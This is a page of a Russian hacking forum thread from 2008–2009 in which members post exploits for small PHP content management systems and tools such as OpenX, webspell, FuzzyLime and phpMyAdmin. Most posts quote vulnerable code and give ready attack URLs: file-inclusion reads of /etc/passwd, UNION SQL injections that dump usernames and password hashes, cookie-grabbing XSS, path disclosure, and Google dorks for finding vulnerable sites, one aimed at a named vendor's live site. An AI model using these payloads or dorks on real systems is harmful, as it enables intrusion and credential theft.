ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #81  
Старый 21.12.2008, 21:22
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию

iGaming CMS


Файл: lang.php
Уязвимый код:
Код:
if(isset($_GET['lang']))   

    $include_lang = $_GET['lang'];
}
elseif(file_exists(TOP_DIR.'/sql/db_connect.php'))
{
    include_once(TOP_DIR.'/functions/db_api.php');
    $include_lang = get_language();
}
else
{
    $include_lang = get_http_accept_lang();
}
include_once(TOP_DIR.'/lang/lang.'.$include_lang.'.php');
Код:
http://path/docs/index.php?lang=/../../../../../../../../../../test
Если magic_quotes_gpc = Off,тогда:

Код:
http://path/docs/index.php?lang=/../../../../../../../../../../etc/passwd%00
Файл: install.php


Уязвимый код:

Код:
switch($_GET['whatlang'])
{
case 1:
    include_once(TOP_DIR.'/lang/lang.'.@$_GET['language'].'.php');
    break;

    default:
    include_once(TOP_DIR.'/lang/lang.English.php');
    break;
}
Код:
http://path/install.php?whatlang=1&language=/../../../../../../../test
Если magic_quotes_gpc = Off,то:

Код:
http://path/install.php?whatlang=1&language=/../../../../../../../etc/passwd%00
SQL иньекция:

Код:
http://path/index.php?sideid=28+union+select+concat(username,0x3a,password),2,3+from+login/*
XSS иньекция:
Код:
http://path/search/?q=%22%3E%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E

Последний раз редактировалось baltazar; 22.12.2008 в 23:52..
 
Ответить с цитированием

  #82  
Старый 22.12.2008, 17:08
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию

Wheatblog


Файл: main.php
Кусок уязвимого кода:
Код:
$config = ereg_replace(":","", $config);

$config = trim(ereg_replace("../","", $config));

$config = trim(ereg_replace("/","", $config));

if (($config=="")|| (!eregi(".inc.php",$config))){$config="config.inc.php"; echo "<!--$config-->\n";}
Код:
http://path/main.php?config=eregi.inc.php\\..\\admin\\.htaccess
Если magic_quotes_gpc =ON,то:
Код:
http://path/main.php?config=eregi.inc.php\..\admin\.htaccess
XSS иньекция:

Код:
http://path/index.php?action=category&id=<script>alert(document.cookie)</script>
 
Ответить с цитированием

  #83  
Старый 23.12.2008, 19:22
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

&
p.w.p. author & author

charname_change.php:
Код:
...
$guid = addslashes($_GET["guid"]);
...
$sql = "SELECT guid, account, CAST(SUBSTRING_INDEX(SUBSTRING_INDEX(`data`, ' ', 1462), ' ', -1) AS UNSIGNED) AS `money`, name FROM characters WHERE guid=$guid AND account=$id";
...
mod spora author

guild.php:
Код:
...
$_GET['page'] = !isset($_GET['page'])?'guilds':$_GET['page'];
...
include("./module/".$_GET['page'].".php");
...
wow-ultimate author

gilds.php:
Код:
...
if (@$_GET['guid']) {
$guildid = addslashes($_GET['guid']);
...
$query_leader_name = $characters_db->query("SELECT * FROM `characters` WHERE `guid` IN (SELECT `guid` FROM `guild_member` WHERE `guildid`=".$guildid.") ORDER by `name`");
...
block-center.php:
Код:
<?php
if (!$menu = &$_GET['page']) 
$menu=$main_page;
print "<table align=\"center\" valign=\"top\" cellSpacing=\"0\" cellPadding=\"0\" width=\"100%\" border=\"0\" ><tr>
<td width=\"100%\" valign=\"top\" align=\"center\" >";
require_once("modules/$menu.php");
print "</td></tr></table>";
?>
MiniManager author
дофига скулей , cвн
 
Ответить с цитированием

  #84  
Старый 28.12.2008, 20:04
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

FGS_Studio cms
sql inj в параметре content_id
например на сайте производителя:
Цитата:
http://fgs.kiev.ua/index.php?lang_id=1&menu_id=1&&content_id=-1+union+select+1,2,3,4,5,6,7,concat(user,0x3c,user pass),9,10,11,load_file(0x3a)+from+user--+
исходники найти не удалось - колонки угадывались методом научного тыка).
dork:
Цитата:
inurl:lang_id= inurl:menu_id=
 
Ответить с цитированием

FuzzyLime CMS
  #85  
Старый 08.01.2009, 02:23
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию FuzzyLime CMS

FuzzyLime CMS

SQL Иньекция:

Код:
http://site/shop_showcat.php?='%20UNION%20ALL%20SELECT%201,2,3,4,5,6,concat(username,':',passwrd)%20from%20users/*
Локальный Инклуд:
Файл:index.php :
Уязвимый кусок кода:
Код:
<?php readfile($Root.$Path); ?> <---[xxx]
<form action="application_loader.php" method="post">
Код:
http://site/index.php?Root=../../../../../../etc/password
Код:
http://index.php?Path=../../../../../../etc/password

XSS:

Код:
http://site/login.php?url=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E

Последний раз редактировалось baltazar; 08.01.2009 в 20:24..
 
Ответить с цитированием

  #86  
Старый 08.01.2009, 20:39
baltazar
Banned
Регистрация: 30.03.2007
Сообщений: 344
Провел на форуме:
5149122

Репутация: 2438
Отправить сообщение для baltazar с помощью ICQ
По умолчанию

yBlog



Локальный Инклуд:



Файл:
pc.lib.php
Кусок уязвимого кода:

Код:
 if (!isset($g_pc_lib_dir))
    $g_pc_lib_dir = "lib";

...

  $g_pc_extension = "php";

  if (!defined("PCLERROR_LIB"))
  {
    include("data/inc/$g_pc_lib_dir/pclerror.lib.$g_pcltar_extension");
  }
  if (!defined("PCLTRACE_LIB"))
  {
    include("data/inc/$g_pc_lib_dir/pcltrace.lib.$g_pcltar_extension");
Код:
http://site/inc/lib/pc.lib.php?g_pc_lib_dir=../../../../../../../../../../../../../etc/passwd%00

SQL Иньекция:

Код:
http://site/search_results.php?cid=-1/**/union/**/select/**/1,version(),3,4,5,6--
XSS Иньекция:
Код:
http://site/yblog/user.php?n=<script>alert(/xss/)</script>
 
Ответить с цитированием

  #87  
Старый 14.01.2009, 15:38
l1ght
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893

Репутация: 2163
По умолчанию

webspell cms 4.01.02 dev

articles.php:
Код:
...
  $title = $_POST['title'];
  $message = $_POST['message'];
  $link1 = $_POST['link1'];
  $url1 = $_POST['url1'];
  $window1 = $_POST['window1'];
  $link2 = $_POST['link2'];
  $url2 = $_POST['url2'];
  $window2 = $_POST['window2'];
  $link3 = $_POST['link3'];
  $url3 = $_POST['url3'];
  $window3 = $_POST['window3'];
  $link4 = $_POST['link4'];
  $url4 = $_POST['url4'];
  $window4 = $_POST['window4'];
  $comments = $_POST['comments'];
  $articlesID = $_POST['articlesID'];

  safe_query("UPDATE ".PREFIX."articles SET 
     title='".mysql_escape_string($title)."',
     content='".mysql_escape_string($message)."',
     link1='".mysql_escape_string($link1)."',
     url1='".mysql_escape_string($url1)."',
     window1='".mysql_escape_string($window1)."',
     link2='".mysql_escape_string($link2)."',
     url2='".mysql_escape_string($url2)."',
     window2='".mysql_escape_string($window2)."',
     link3='".mysql_escape_string($link3)."',
     url3='".mysql_escape_string($url3)."',
     window3='".mysql_escape_string($window3)."',
     link4='".mysql_escape_string($link4)."',
     url4='".mysql_escape_string($url4)."',
     window4='".mysql_escape_string($window4)."',
     saved='1', comments='$comments' WHERE articlesID='$articlesID'");
whoisonline.php:
Цитата:
$sort = $_GET['sort'];
$type = $_GET['type'];
...
$ergebnis = safe_query("SELECT * FROM ".PREFIX."whoisonline ORDER BY $sort $type");
dork:
Цитата:
inurl:site=whoisonline inurl:desc
шелл заливается либо через squads:

либо через шаблоны
 
Ответить с цитированием

Уязвимости различных CMS и скриптов
  #88  
Старый 19.01.2009, 06:29
Twoster
Reservists Of Antichat - Level 6
Регистрация: 20.08.2008
Сообщений: 328
Провел на форуме:
7144817

Репутация: 1503
По умолчанию Уязвимости различных CMS и скриптов

Создал эту тему, дабы не плодить кучу тем с найдеными мной (либо не мой) уязвимостями в недоCMS и прочих интересных продуктах! =)

Сайт производитель: http://wdt.org.ru
Продукт: DPortal
Версия: 1.1
(wap-CMS)

Локальное чтение файлов:
Цитата:
http://site.ru/file/opis.php?ver=html&login=Twoster&pas=&katal=Upgrade s&file=../../uzer/Admin%00
XSS (Повсюду):

Цитата:
http://site.ru/file/obzor.php?ver=html&pas="><script>alert()</script>&katal=Upgrades
http://site.ru/file/obzor.php?ver=html"><script>alert()</script>&pas=&katal=Upgrades
http://site.ru/file/obzor.php?ver=html&pas=&katal=Upgrades"><script>al ert()</script>
http://site.ru/file/opis.php?ver=html&login=Twoster&pas=&katal=Upgrade s&file=Upgrade1.zip"><script>alert()</script>
http://site.ru/gbyk/say.php?ver=html&pas=&login=&obr=-Twost"><script>alert()</script>
Сайт производитель: http://steadycms.ru/
Продукт: Steady-CmS
Версия: 5.5
(wap-CMS)

SQL-inj

По всему скрипту не фильтруется User-agent.
Примерный эксплойт:
Цитата:
Opera/9.51 (Windows NT 5.1; U; ru)',sex='m
Сайт производитель: http://linkorcms.ru/
Продукт: LinkorCMS
Версия: 1.2

XSS
Цитата:
1. http://cms.ru/index.php?name=search&op=search
Уязвимо поле поиска : searchstr
Цитата:
2. http://cms.ru/index.php?name=user&op=registration
2.1 Ваше имя на сайте - переменная nikname
2.2 Настоящее имя(Ф.И.О.) - переменная realname
2.3 Сайт - переменная homepage
2.4 Город - переменная city
Сайт производитель: www.phpmyadmin.net/
Продукт: phpMyAdmin 2.6.1
Версия: 2.6.1

Расскрытие путей
Цитата:
http://localhost/Tools/phpMyAdmin/tbl_properties.php?lang[]=ru-win1251
http://localhost/Tools/phpMyAdmin/tbl_properties.php?server[]=1
http://localhost/Tools/phpMyAdmin/tbl_properties.php?collation_connection[]=cp1251_general_ci
http://localhost/Tools/phpMyAdmin/tbl_properties.php?db[]=aaa&table=aaa
http://localhost/Tools/phpMyAdmin/sql.php?sql_query[]=
http://localhost/Tools/phpMyAdmin/server_export.php?convcharset[]=iso-8859-1
__________________

You may say I'm a dreamer
But I'm not the only one
 
Ответить с цитированием

  #89  
Старый 20.01.2009, 13:53
Артем Солнце
Banned
Регистрация: 19.01.2009
Сообщений: 26
Провел на форуме:
161729

Репутация: 67
По умолчанию

Обзор уязвимостей OpenX 2.6.3
Раскрытие путей:
Код:
/openx/www/api/v1/common/BaseAdvertiserService.php
/openx/www/api/v1/common/BaseAgencyService.php
/openx/www/api/v1/common/BaseBannerService.php
/openx/www/api/v1/common/BaseCampaignService.php
/openx/www/api/v1/common/BaseLogonService.php
/openx/www/api/v1/common/BasePublisherService.php
/openx/www/api/v1/common/BaseServiceImpl.php
/openx/www/api/v1/common/BaseUserService.php
/openx/www/api/v1/common/BaseZoneService.php
/openx/www/api/v1/common/XmlRpcUtils.php
/openx/www/api/v1/xmlrpc/AdvertiserServiceImpl.php
/openx/www/api/v1/xmlrpc/AgencyServiceImpl.php
/openx/www/api/v1/xmlrpc/BannerServiceImpl.php
/openx/www/api/v1/xmlrpc/CampaignServiceImpl.php
/openx/www/api/v1/xmlrpc/LogonServiceImpl.php
/openx/www/api/v1/xmlrpc/PublisherServiceImpl.php
/openx/www/api/v1/xmlrpc/UserServiceImpl.php
/openx/www/api/v1/xmlrpc/ZoneServiceImpl.php
/openx/www/admin/config.php
/openx/plugins/3rdPartyServers/3rdPartyServers.php
/openx/plugins/3rdPartyServers/adtech/adtech.plugin.php
/openx/plugins/3rdPartyServers/atlas/atlas.plugin.php
/openx/plugins/3rdPartyServers/bluestreak/bluestreak.plugin.php
/openx/plugins/3rdPartyServers/cpx/cpx.plugin.php
/openx/plugins/3rdPartyServers/doubleclick/doubleclick.plugin.php
/openx/plugins/3rdPartyServers/eyeblaster/eyeblaster.plugin.php
/openx/plugins/3rdPartyServers/falk/falk.plugin.php
/openx/plugins/3rdPartyServers/google/google.plugin.php
/openx/plugins/3rdPartyServers/kontera/kontera.plugin.php
/openx/plugins/3rdPartyServers/max/max.plugin.php
/openx/plugins/3rdPartyServers/mediaplex/mediaplex.plugin.php
/openx/plugins/3rdPartyServers/tangozebra/tangozebra.plugin.php
/openx/plugins/3rdPartyServers/tradedoubler/tradedoubler.plugin.php
/openx/plugins/3rdPartyServers/ypn/ypn.plugin.php
/openx/plugins/Maintenance/Maintenance.php
/openx/plugins/authentication/Authentication.php
/openx/plugins/authentication/cas/cas.plugin.php
/openx/plugins/authentication/cas/OaCasClient.php
/openx/plugins/authentication/cas/Controller/ConfirmAccount.php
/openx/plugins/authentication/cas/Central/RpcMapper.php
/openx/plugins/authentication/cas/Central/Cas.php
/openx/plugins/authentication/cas/CAS/PGTStorage/pgt-db.php
/openx/plugins/authentication/cas/CAS/PGTStorage/pgt-file.php
/openx/plugins/authentication/cas/CAS/languages/english.php
/openx/plugins/authentication/cas/CAS/languages/french.php
/openx/plugins/authentication/cas/CAS/languages/german.php
/openx/plugins/authentication/cas/CAS/languages/greek.php
/openx/plugins/authentication/cas/CAS/languages/japanese.php
/openx/plugins/authentication/internal/internal.plugin.php
/openx/plugins/channelDerivation/ChannelDerivation.php
/openx/plugins/channelDerivation/mysql/mysql.plugin.php
/openx/plugins/channelDerivation/xmlrpc/xmlrpc.plugin.php
/openx/plugins/deliveryLimitations/Client/Browser.delivery.php
/openx/plugins/deliveryLimitations/Client/Browser.plugin.php
/openx/plugins/deliveryLimitations/Client/Domain.delivery.php
/openx/plugins/deliveryLimitations/Client/Domain.plugin.php
/openx/plugins/deliveryLimitations/Client/Ip.delivery.php
/openx/plugins/deliveryLimitations/Client/Ip.plugin.php
/openx/plugins/deliveryLimitations/Client/Language.delivery.php
/openx/plugins/deliveryLimitations/Client/Language.plugin.php
/openx/plugins/deliveryLimitations/Client/Os.delivery.php
/openx/plugins/deliveryLimitations/Client/Os.plugin.php
/openx/plugins/deliveryLimitations/Client/Useragent.delivery.php
/openx/plugins/deliveryLimitations/Client/Useragent.plugin.php
/openx/plugins/deliveryLimitations/DeliveryLimitations.php
/openx/plugins/deliveryLimitations/DeliveryLimitationsArrayData.php
/openx/plugins/deliveryLimitations/DeliveryLimitationsCommaSeparatedData.php
/openx/plugins/deliveryLimitations/DeliveryLimitationsResourceData.php
/openx/plugins/deliveryLimitations/Geo/Areacode.delivery.php
/openx/plugins/deliveryLimitations/Geo/Areacode.plugin.php
/openx/plugins/deliveryLimitations/Geo/City.delivery.php
/openx/plugins/deliveryLimitations/Geo/Organisation.delivery.php
/openx/plugins/statisticsFieldsTargeting/statisticsFieldsTargeting.php
/openx/plugins/statisticsFieldsTargeting/default/default.plugin.php
/openx/plugins/statisticsFieldsDelivery/statisticsFieldsDelivery.php
/openx/plugins/statisticsFieldsDelivery/default/default.plugin.php
/openx/plugins/statisticsFieldsDelivery/affiliates/affiliates.plugin.php
/openx/plugins/reports/admin/breakdown.plugin.php
/openx/plugins/reports/Reports.php
Узнаем версию:
Цитата:
/openx/UPGRADE.txt
/openx/TRANSLATIONS.txt
/openx/RELEASE_NOTES.txt
SQL Injection (Нужны права администратора):
Код:
/openx/www/admin/campaign-banners.php?clientid=1)+union+select+1,2,concat(us ername,0x3a,password),4,5+from+ox_users/*&campaignid=1
Код:
/openx/www/admin/campaign-edit.php?clientid=3)+union+select+1,2,concat(usern ame,0x3a,password),4,5+from+ox_users/*&campaignid=5
Код:
/openx/www/admin/banner-acl.php?clientid=1&campaignid=3&bannerid=1)+union+select+1,2,concat(username,0x3a, password),4,5,6+from+ox_users/*
SQL Инъекции валидны только тогда когда добавлено хотя бы одна учетная запись.

Активная XSS
При добавлении новой учетной записи уязвимые поля: "Имя" и "Контакты".
При добавлении нового клиента узвимы поля: "Имя", "Контакт" и "Комментарии".
При добавлении нового сайта уязвимы поля: "URL веб-сайта", "Имя" и "Контакт"
При добавлении новой зоны уязвимы поля: "Описание" и "Комментарий"
При добавлении нового канала таргетинга уязвимы поля: "Имя", "Описание" и "Комментарии".
При добавлении нового трекера уязвимы поля: "Имя" и "Описание"
Фильтрации нет вообще.

Пасивная XSS
Код:
/openx/www/admin/tracker-append.php?clientid=[CODE_XSS]&trackerid=1%27
/openx/www/admin/advertiser-trackers.php?clientid=[CODE_XSS]
Бояню от сюда: http://209.85.129.132/search?q=cache:yPQ62-iGZbcJ:https://forum.antichat.ru/showthread.php%3Fp%3D1038739+antichat.ru+openx
 
Ответить с цитированием

  #90  
Старый 24.01.2009, 03:23
AFoST
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
Провел на форуме:
5571194

Репутация: 1934


Отправить сообщение для AFoST с помощью ICQ
По умолчанию

производитель: kan-studio.ru
продукт Kandidat CMS v.1.3.1
pXSS
всё работает при register_globals=on
Код HTML:
http://kandidat/admin/login.php?contentcenter=123'%22%3E%3Cscript%3Ealert(1)%3C/script%3E
в исходнике проверяется лишь наличие куков, а на содержание пофик
Код HTML:
get http://kandidat/media/upload.php?contentcenter=<script>alert(1)</script> HTTP/1.0
Host: kandidat
Cookie: KNcookies=123;
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
Proxy-Connection: Keep-Alive
__________________
Появляюсь редко. Важные дела в реале.
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30
Основные методы взлома и защиты скриптов на Php DIAgen Авторские статьи 8 28.05.2006 12:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ